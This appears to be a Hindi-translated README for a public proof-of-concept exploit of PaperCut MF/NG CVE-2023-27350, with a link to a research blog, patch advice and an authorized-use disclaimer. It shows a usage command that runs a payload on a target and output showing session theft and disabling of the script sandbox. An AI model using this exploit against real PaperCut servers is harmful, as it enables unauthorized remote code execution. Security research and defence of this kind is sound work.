
PaperCut CVE-2023-27350 के लिए Proof-of-concept exploit, जो authentication bypass को built-in scripting abuse के साथ chain करके कमजोर MF/NG instances पर remote code execution प्राप्त करता है।
PaperCut MF/NG पर प्रभाव डालने वाले CVE-2023-27350 के लिए POC
भेद्यता का तकनीकी मूल कारण विश्लेषण, समझौता संकेतक और इंटरनेट एक्सपोजर हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise
यह POC एक प्रमाणीकरण बाईपास भेद्यता का उपयोग करता है जिसे कोड निष्पादित करने के लिए अंतर्निहित स्क्रिप्टिंग कार्यक्षमता के दुरुपयोग के साथ जोड़ा गया है।
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
नवीनतम संस्करण में अपडेट करें या PaperCut सुरक्षा सलाहकार में दिए गए निर्देशों का पालन करके शमन करें
यह सॉफ़्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग स्पष्ट रूप से अधिकृत प्रणालियों को छोड़कर अन्य पर आक्रमण करने के लिए नहीं किया जाना चाहिए। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।